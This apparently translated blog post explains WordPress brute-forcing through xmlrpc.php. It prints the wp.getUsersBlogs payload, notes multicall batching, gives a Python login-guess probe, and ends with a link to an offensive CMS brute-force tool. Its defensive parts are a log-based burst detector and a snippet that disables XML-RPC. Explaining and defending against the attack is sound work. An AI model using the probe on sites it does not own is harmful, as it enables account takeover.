After getting back from my driving lesson tonight I was browsing Freebuf and saw the article "Brute-forcing WordPress via xmlrpc.php" (利用xmlrpc.php对WordPress进行暴力破解攻击), which reminded me of an earlier WordPress security piece in the WooYun knowledge base: "Over 160,000 WordPress sites used to launch DDoS attacks" (超过16W的WordPress网站被用来做DDoS攻击). So I immediately logged into the server to see whether any scanners had paid my blog a visit. I found plenty of 404 requests (nothing new; they show up every day, and I block each one for a while when I spot it), but luckily none for the xmlrpc.php page (not sure whether to be pleased or disappointed o(╯□╰)o).
Following the related link Freebuf gave, Blocking more WordPress xmlrpc.php attacks, together with Freebuf's explanation and a few simple POST requests I sent with Fiddler2, I learned a few things, and that's enough for me.
Opening http://ixyzero.com/blog/xmlrpc.php directly in a browser (a plain GET) returns:
XML-RPC server accepts POST requests only.
That line only means the endpoint refuses GET; it is still live for POST, which is all the attack needs.
This attack via xmlrpc.php sidesteps the brute-force protection in front of the normal WordPress login page: the guesses never touch wp-login.php, so a lockout or rate-limiting plugin that only watches that page never sees them. The attacker simply POSTs the following XML to xmlrpc.php:

```xml
<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>username</value></param>
    <param><value>password</value></param>
  </params>
</methodCall>
```
Here username is an account name collected beforehand and password is the guess being tried. A wrong guess comes back as an XML-RPC fault inside an HTTP 200 response, and a right one returns the list of blogs that user can access, so the outcome is visible without ever touching the login form. The same endpoint also accepts system.multicall, which lets an attacker pack many wp.getUsersBlogs calls into a single POST. For more on the getUsersBlogs method, see the official WordPress XML-RPC documentation.
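To make the exchange concrete, here is an added example (not code from the original post or from WordPress itself) that builds the same wp.getUsersBlogs request with Python's standard xmlrpc.client and classifies the server's reply. The sample responses are constructed to mirror WordPress's XML-RPC fault format: fault code 403 for bad credentials and 405 for a disabled endpoint are the codes wp-includes/class-wp-xmlrpc-server.php uses, the exact fault strings are an assumption, the site URL is the blog's own from the post, and try_login is meant only for sites you are authorised to test.

```python
import urllib.request
import xmlrpc.client
from xml.parsers.expat import ExpatError
from xmlrpc.client import Fault

METHOD = "wp.getUsersBlogs"


def build_payload(username: str, password: str) -> bytes:
    """Serialise the wp.getUsersBlogs call shown in the post, ready to POST to xmlrpc.php.

    xmlrpc.client wraps the strings in <string> tags; the bare <value> form in the
    post means the same thing, since string is the default XML-RPC value type.
    """
    return xmlrpc.client.dumps((username, password), methodname=METHOD).encode("utf-8")


def classify_response(body: bytes) -> str:
    """Map an xmlrpc.php response body to a verdict.

    Every one of these cases arrives as HTTP 200: the result of the guess lives
    in the XML body, not in the status code.
    """
    try:
        params, _method = xmlrpc.client.loads(body)
    except Fault as fault:
        # Fault codes as used by wp-includes/class-wp-xmlrpc-server.php; the codes
        # are what matters, the wording of the sample faults below is an assumption.
        if fault.faultCode == 403:
            return "invalid-credentials"
        if fault.faultCode == 405:
            return "xmlrpc-disabled"
        return "fault-%d" % fault.faultCode
    except (ExpatError, xmlrpc.client.ResponseError):
        # Not an XML-RPC packet at all, e.g. the plain-text line a browser GET receives.
        return "not-xmlrpc"
    # A successful call returns the list of blogs the user can access.
    return "valid-credentials" if params and isinstance(params[0], list) else "unexpected"


def try_login(url: str, username: str, password: str, timeout: float = 10.0) -> str:
    """POST a single guess to a site you are authorised to test (network call, not run offline)."""
    request = urllib.request.Request(
        url,
        data=build_payload(username, password),
        headers={"Content-Type": "text/xml"},
        method="POST",
    )
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return classify_response(response.read())


# Constructed sample replies (not captured traffic), in WordPress's XML-RPC response format.
SAMPLE_INVALID = xmlrpc.client.dumps(
    Fault(403, "Incorrect username or password."), methodresponse=True
).encode("utf-8")
SAMPLE_DISABLED = xmlrpc.client.dumps(
    Fault(405, "XML-RPC services are disabled on this site."), methodresponse=True
).encode("utf-8")
SAMPLE_VALID = xmlrpc.client.dumps(
    ([{"blogid": "1", "blogName": "ixyzero", "url": "http://ixyzero.com/blog/",
       "xmlrpc": "http://ixyzero.com/blog/xmlrpc.php", "isAdmin": True}],),
    methodresponse=True,
).encode("utf-8")
SAMPLE_GET = b"XML-RPC server accepts POST requests only."

if __name__ == "__main__":
    print(build_payload("admin", "123456").decode())
    for name, body in [("invalid", SAMPLE_INVALID), ("disabled", SAMPLE_DISABLED),
                       ("valid", SAMPLE_VALID), ("browser GET", SAMPLE_GET)]:
        print(name, "->", classify_response(body))
    # try_login("http://ixyzero.com/blog/xmlrpc.php", "admin", "123456")  # only against your own site
```

The classifier is the same logic a brute-force tool and a defender's probe both need: a 403 fault means the endpoint is open and the guess was wrong, a 405 fault means the xmlrpc_enabled filter (or equivalent) is in place, and anything that is not XML-RPC at all means the request never reached the XML-RPC handler.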
The fix, as given in the linked article:
What can I do to prevent these attacks?
Choose a strong password. Update WordPress and your plugins as soon as updates are available. Use two factor authentication. (That is: choose a sufficiently complex password, which helps against any brute-force attack; update WordPress and its plugins promptly; install and enable the Google two-step verification plugin.)
Doing just those three things will ensure that attacks like this have no effect on your site, whether your hosting company is able to block them or not.
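The author above checked the access log by hand for xmlrpc.php hits. As an added example (not from the original post), the following Python detector does that over combined-format log lines, counting POST /xmlrpc.php requests per client IP in a sliding window and flagging clients over a threshold. The log lines are constructed, not real traffic, and the threshold and window are assumptions to tune per site. It deliberately ignores the HTTP status, because WordPress returns a failed XML-RPC login as HTTP 200 with the fault in the body, so a rule that counts 401/403 responses would see nothing.

```python
import re
from datetime import datetime, timedelta, timezone

# Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str):
    """Return (ip, timestamp, method, path, status), or None for lines that do not parse."""
    match = LOG_RE.match(line)
    if not match:
        return None
    ts = datetime.strptime(match.group("ts"), TS_FORMAT)
    return match.group("ip"), ts, match.group("method"), match.group("path"), int(match.group("status"))


def find_xmlrpc_bursts(log_text: str, threshold: int = 20, window_seconds: int = 300) -> dict:
    """Return {ip: n} for clients that POSTed to xmlrpc.php at least `threshold` times
    inside any span of `window_seconds`; n is the count in the busiest such span."""
    window = timedelta(seconds=window_seconds)
    hits = {}
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        ip, ts, method, path, _status = record
        # The status code is ignored on purpose: a failed XML-RPC login is HTTP 200
        # with the fault in the body, so counting error statuses would miss it.
        if method == "POST" and path.split("?", 1)[0].endswith("/xmlrpc.php"):
            hits.setdefault(ip, []).append(ts)

    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start, busiest = 0, 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[start] > window:
                start += 1
            busiest = max(busiest, end - start + 1)
        if busiest >= threshold:
            flagged[ip] = busiest
    return flagged


def _make_sample_log() -> str:
    """Constructed traffic, not real log data: one burst, one slow scanner, one reader."""
    base = datetime(2014, 3, 10, 21, 0, 0, tzinfo=timezone(timedelta(hours=8)))
    line = '{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'

    def entry(ip, offset, method, path, status=200):
        return line.format(ip=ip, ts=(base + offset).strftime(TS_FORMAT),
                           method=method, path=path, status=status)

    lines = []
    # 25 password guesses in under a minute, every one answered with HTTP 200.
    lines += [entry("203.0.113.7", timedelta(seconds=2 * i), "POST", "/blog/xmlrpc.php") for i in range(25)]
    # 4 guesses spread over an hour: stays under the default threshold.
    lines += [entry("198.51.100.2", timedelta(minutes=15 * i), "POST", "/blog/xmlrpc.php") for i in range(4)]
    # An ordinary visitor, plus the browser GET shown in the post (not a POST, so not counted).
    lines.append(entry("192.0.2.1", timedelta(minutes=3), "GET", "/blog/"))
    lines.append(entry("192.0.2.1", timedelta(minutes=4), "GET", "/blog/xmlrpc.php"))
    return "\n".join(lines)


SAMPLE_LOG = _make_sample_log()

if __name__ == "__main__":
    for ip, n in find_xmlrpc_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {n} POSTs to xmlrpc.php inside 5 minutes")
```

Pipe a real access log into find_xmlrpc_bursts and feed the flagged addresses to whatever you already use for blocking (the author's "spot one, block it for a while" routine, fail2ban, or a firewall rule). If the site disables XML-RPC as the comment below does, any POST to xmlrpc.php at all becomes worth flagging, so the threshold can drop to 1.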
2 comments on "Brute-forcing WordPress via xmlrpc.php"
```php
/**
 * Disable XML-RPC & X-Pingback
 * Drop this into your theme's functions.php or a must-use plugin.
 * http://wordpress.stackexchange.com/questions/219643/best-way-to-eliminate-xmlrpc-php
 * http://wordpress.stackexchange.com/questions/31943/is-there-a-way-to-completely-turn-off-pingbacks-trackbacks
 * http://www.wpbeginner.com/plugins/how-to-disable-xml-rpc-in-wordpress/
 */
// Disable XML-RPC. Note that this filter is checked in the login step, so it stops
// every authenticated method (wp.getUsersBlogs included); unauthenticated methods
// such as pingback.ping still respond unless blocked at the web server.
add_filter( 'xmlrpc_enabled', '__return_false' );
// Remove the X-Pingback header so the endpoint is not advertised on every page.
function disable_x_pingback( $headers ) {
	unset( $headers['X-Pingback'] );
	return $headers;
}
add_filter( 'wp_headers', 'disable_x_pingback' );
```
A Perl script that automates brute-forcing account passwords on WordPress, Joomla, Drupal, OpenCart, Magento and similar sites:
https://github.com/Moham3dRiahi/XBruteForcer